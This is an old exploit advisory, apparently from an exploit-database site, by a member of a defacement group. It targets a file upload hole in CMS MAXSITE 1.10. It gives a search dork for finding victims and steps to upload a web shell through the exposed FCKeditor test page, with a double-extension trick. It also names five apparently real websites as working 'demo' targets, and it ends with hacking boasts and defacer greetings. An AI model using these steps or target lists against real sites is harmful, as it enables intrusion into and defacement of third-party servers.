CMS MAXSITE Remote File Upload Vulnerability <= 1.10



EKU-ID: 1219 CVE: OSVDB-ID:
Author: HashoR Published: 2011-10-31 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


=================================================================================

Web             : ashiyane.org

e-mail          : HashoR [DOT] BlackHat [AT] Gmail.Com             

                      #########################################
                       I'm HashoR , member from ashiyane.org
                            -!We Love KurDestaN!-
                      #########################################

================================================================================
------|-------------------------------------------------------|------
####
# Exploit : CMS MAXSITE Remote File Upload Vulnerability <= 1.10
# Author : HashoR
# Vendor or Software Link : http://maxsite.geniuscyber.com/index.php?name=index
# Version : 1.10
# Team: Ashiyane Digital Security Team
# E-mail: HashoR [DOT] BlackHat [AT] Gmail.Com
# Google Dork: intitle:"## MAXSITE 1.10 ##"
# Tested on : LinuX
####

# Explo!T:
# G0 To :  http://site.com/Path/FCKeditor/editor/filemanager/upload/test.html
## Select the "File Uploader" to use: Php
### upload sh3ll.php6 0r sh3ll.php;.jpg ...........
#### go to http://site.com/UserFiles/File/sh3ll.php6

# DemO:

http://www.niteslink.net/web/FCKeditor/editor/filemanager/upload/test.html
http://www.na.mahidol.ac.th/maxsiteclinic/FCKeditor/editor/filemanager/upload/test.html
http://crrgrandgroup.com/FCKeditor/editor/filemanager/upload/test.html
http://chonburi33.com/FCKeditor/editor/filemanager/upload/test.html
http://prachuap.go.th/mitgames/FCKeditor/editor/filemanager/upload/test.html
###
[+] LoL.......
# By HashoR!   
• We Will Never Stop Hacking
                           • Its not a game
                                            • It's Our Job
                              enjoy!       
||> Special Greeting To: All members in Ashiyane.org

####
# Owned BoX:

Behrooz_Ice - Q7x - Sha2ow - Virangar - Azazel - Ali_Eagle - keivan
taghva - elvator - mmilad200 - PrinceofHacking - iman_taktaz - ERroR
Black - Rz04 - ruin3r - Gladiator - unique2world - EroRR
M3QD4D - Http://Askn - Classic - n3me3iz - Zend - r3d.z0nE
HIDDEN-HUNTER - Hijacker - AliAkh - A.S.P.I.R.I.N - *Alexander* - Pr0grammer- HASSAN20- AR455

Greetz: hashor- ArmanSoftware - removal_load - B3HR0Z - @Master - Satanic2000 - N4H - angola
And All Ashiyane Defacers
------|-------------------------------------------------------|------